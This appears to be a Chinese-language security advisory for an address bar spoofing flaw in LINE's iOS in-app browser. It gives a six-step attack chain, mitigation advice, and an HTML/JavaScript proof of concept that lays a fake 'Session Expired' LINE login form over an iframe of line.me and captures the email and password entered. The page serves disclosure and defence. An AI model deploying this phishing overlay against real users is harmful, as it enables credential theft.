CVE-2025-14021 LINE iOS应用内浏览器地址栏欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-14021

漏洞类型

地址栏欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

LINE client for iOS

漏洞概述

CVE-2025-14021是LINE公司iOS版即时通讯客户端中的一个中危安全漏洞。该漏洞存在于LINE应用内嵌的浏览器组件中，攻击者可以利用iframe元素结合JavaScript代码，在用户不知情的情况下修改地址栏显示内容，使其呈现为可信的合法网站地址，而实际加载的内容却来自攻击者控制的恶意服务器。这种地址栏欺骗技术允许攻击者在保持可信域名显示的同时，在页面上叠加钓鱼表单、广告或其他恶意内容，从而窃取用户的敏感信息如登录凭证、支付信息或个人数据。由于LINE在亚洲市场拥有庞大的用户群体，特别是在日本、泰国等地应用广泛，该漏洞可能影响大量iOS设备用户。攻击者通常通过钓鱼邮件、恶意链接或社交工程手段诱导用户访问特制的网页，进而利用该漏洞实施诈骗和数据窃取活动。

技术细节

该地址栏欺骗漏洞的根本原因在于LINE iOS客户端内嵌浏览器的安全策略缺陷。当攻击者创建一个包含可信域名URL的iframe，并在此iframe内部执行恶意JavaScript代码时，浏览器未能正确隔离iframe的上下文与父窗口的地址栏显示。具体来说，攻击者构造一个看似指向合法网站（如银行、社交媒体或电商平台）的URL，但实际内容通过JavaScript动态生成并覆盖在iframe之上。由于LINE内置浏览器的地址栏渲染逻辑存在缺陷，用户看到的地址栏仍显示原始可信URL，而实际交互的内容已被替换。攻击者可以利用CSS样式的精确控制，使恶意内容与合法网站的外观高度相似，甚至可以拦截用户在伪造表单中输入的敏感信息并发送到远程服务器。此攻击方式对普通用户来说极难察觉，因为地址栏显示的可信度是用户判断网站安全性的主要依据之一。

攻击链分析

STEP 1

步骤1: 侦察与准备

攻击者识别目标为LINE iOS客户端用户，通过收集情报确定攻击范围和目标用户群体

STEP 2

步骤2: 构造恶意页面

攻击者创建包含可信URL iframe和恶意JavaScript代码的钓鱼页面，该页面设计为模仿LINE官方登录界面

STEP 3

步骤3: 分发钓鱼链接

通过钓鱼邮件、恶意短信、社交媒体或LINE内消息传播包含恶意页面的链接，诱导用户点击

STEP 4

步骤4: 利用漏洞加载恶意内容

用户点击链接后，LINE内置浏览器加载包含iframe的页面，iframe显示合法URL（如line.me），同时恶意JavaScript在iframe上方叠加钓鱼内容

STEP 5

步骤5: 窃取敏感信息

用户看到地址栏显示可信域名，误以为是官方页面，在伪造的登录表单中输入账号密码等敏感信息

STEP 6

步骤6: 数据外传

恶意JavaScript捕获用户输入的凭证并发送到攻击者控制的远程服务器，完成信息窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14021 PoC: Address Bar Spoofing in LINE iOS In-App Browser -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>LINE iOS Address Bar Spoofing PoC</title>
    <style>
        body { margin: 0; padding: 0; font-family: Arial, sans-serif; }
        .spoofed-content {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 1000;
        }
        .login-form {
            background: white;
            padding: 40px;
            border-radius: 10px;
            box-shadow: 0 10px 40px rgba(0,0,0,0.3);
            text-align: center;
        }
        .login-form h2 { color: #333; margin-bottom: 20px; }
        .login-form input {
            width: 250px;
            padding: 12px;
            margin: 10px 0;
            border: 1px solid #ddd;
            border-radius: 5px;
            font-size: 14px;
        }
        .login-form button {
            width: 100%;
            padding: 12px;
            background: #00B900;
            color: white;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            margin-top: 10px;
        }
        .login-form button:hover { background: #009900; }
        .real-page { 
            position: relative;
            height: 100vh;
            background: #f5f5f5;
            padding: 20px;
        }
        .hidden { display: none; }
    </style>
</head>
<body>
    <!-- Legitimate looking iframe to spoof address bar -->
    <iframe id="spoofFrame" src="https://www.line.me/" style="width:100%; height:100%; border:none;"></iframe>
    
    <!-- Overlay malicious content -->
    <div id="maliciousOverlay" class="spoofed-content">
        <div class="login-form">
            <h2>⚠️ Session Expired</h2>
            <p style="color:#666; margin-bottom:15px;">Please verify your identity</p>
            <form id="phishingForm">
                <input type="text" id="email" placeholder="Email or Phone" required>
                <input type="password" id="password" placeholder="Password" required>
                <button type="submit">Sign In</button>
            </form>
            <p style="font-size:12px; color:#999; margin-top:15px;">Secured by LINE</p>
        </div>
    </div>

    <script>
        // Wait for iframe to load, then overlay phishing content
        document.getElementById('spoofFrame').onload = function() {
            setTimeout(() => {
                // Inject malicious content that appears to be part of LINE
                const overlay = document.getElementById('maliciousOverlay');
                overlay.style.display = 'flex';
                
                // Attempt to hide real URL in address bar context
                // In LINE's in-app browser, this content overlays the iframe
                // while the address bar still shows the iframe's URL
            }, 1500);
        };

        // Capture credentials
        document.getElementById('phishingForm').onsubmit = function(e) {
            e.preventDefault();
            const credentials = {
                email: document.getElementById('email').value,
                password: document.getElementById('password').value,
                timestamp: new Date().toISOString(),
                userAgent: navigator.userAgent
            };
            
            console.log('Stolen credentials:', credentials);
            alert('Verification failed. Please try again.');
        };
    </script>
</body>
</html>

影响范围

LINE client for iOS < 14.14

防御指南

临时缓解措施

在LINE官方发布修复版本之前，用户应避免在LINE应用内浏览器中输入任何敏感信息，尤其是登录凭证。建议优先使用设备原生浏览器（如Safari）访问LINE相关服务，避免点击来源不明的链接。对于必须通过LINE分享的链接，用户应在点击前仔细确认链接来源，避免访问可疑网站。如发现异常登录提示或页面样式不一致，应立即关闭页面并更改账户密码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14021
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14021
3 Details https://www.cvedetails.com/cve/CVE-2025-14021/
4 VulDB https://vuldb.com/cve/CVE-2025-14021
5 Link https://hackerone.com/reports/2548498